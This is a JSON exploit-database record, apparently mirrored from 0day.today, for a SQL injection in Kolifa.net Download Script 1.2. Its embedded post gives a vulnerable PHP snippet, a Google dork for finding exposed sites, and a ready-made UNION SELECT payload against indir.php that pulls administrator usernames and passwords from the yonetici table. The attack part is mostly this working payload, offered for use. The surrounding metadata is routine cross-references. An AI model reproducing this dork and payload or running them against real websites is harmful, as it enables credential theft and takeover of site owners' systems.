{"published": "2008-08-26T00:00:00", "id": "1337DAY-ID-3565", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-01-03T19:04:58", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220191503"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/GITLIST_ARG_INJECTION", "MSF:AUXILIARY/SCANNER/HTTP/ONION_OMEGA2_LOGIN", "MSF:EXPLOIT/MULTI/HTTP/WP_DB_BACKUP_RCE", "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSHACLUSTER_RCE", "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "MSF:AUXILIARY/SCANNER/HTTP/DICOOGLE_TRAVERSAL", "MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC", "MSF:AUXILIARY/SCANNER/HTTP/WP_ARBITRARY_FILE_DELETION", "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR", "MSF:EXPLOIT/LINUX/HTTP/HP_VAN_SDN_CMD_INJECT"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1503.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-31403"]}, {"type": "exploitdb", "idList": ["EDB-ID:45671"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147456", "PACKETSTORM:149926"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D1236C309752040951CA6CF70D1EEE69"]}, {"type": "saint", "idList": ["SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:A9B0B05DC77287BBA5CCE7B14B30EB70"]}, {"type": "seebug", "idList": ["SSV:97269"]}], "modified": "2018-01-03T19:04:58", "rev": 2}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-01-03T19:04:58", "edition": 2, "title": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3565", "modified": "2008-08-26T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/3565", "references": [], "reporter": "Kacak", "sourceData": "===============================================================\r\nKolifa.net Download Script 1.2 (id) SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\nTitle: Kolifa.Net Download Script (indir.php)\r\n\r\n================================================================\r\n\r\n[+] Author : Kacak\r\n\r\n[+] Special Thankz : Sa0 & Knock0ut & Biyocanlar & BilisimCanlar & All My Friends\r\n\r\n[+] http://www.lmfrf.org/kolifanet-download-script-12-sql-injection-vulnerability/2008/08/26/web-script-bug/\r\n\r\n=================================================================\r\n\r\nScript : Kolifa.Net Download Script\r\n\r\nDemo : http://kolifadwn.awardspace.com/down\r\n\r\nGoogle Dork : inurl:prog.php?dwkodu=\r\n\r\nError Code : \r\n\r\n<?php\r\n//*****************************\r\n//*****************************\r\n//********** KOLIFA ***********\r\n//********** DOWNLOAD *********\r\n//********** SCRIPT ***********\r\n//*****************************\r\n//****** www.kolifa.net *******\r\n//*****************************\r\nini_set('error_reporting', E_ALL^E_NOTICE);\r\ninclude(\"ayarlar.php\");\r\nrequire('fonksiyon.php');\r\n$baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die(\"Veritaban?na baglan?lamad?.\");\r\n$sec = mysql_select_db($db);\r\n$dwkodu=strip_tags($_GET['id']);\r\n$act=strip_tags($_GET['act']);\r\n?>\r\n\r\n---------------------------\r\n\r\nExample : http://[Site]/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/\r\n\r\n[<p>Eger Yuklenme Islemi Baslamazsa <a href=\"Username:Password\">Buraya T?klay?n</a></td>]\r\n\r\n\r\n###############################################################\r\n\r\n< -- bug code start -- >\r\n\r\nwww.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*\r\n\r\n/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*\r\n\r\n< -- bug code end of -- >\r\n\r\n\r\n\n# 0day.today [2018-01-03] #"}

{}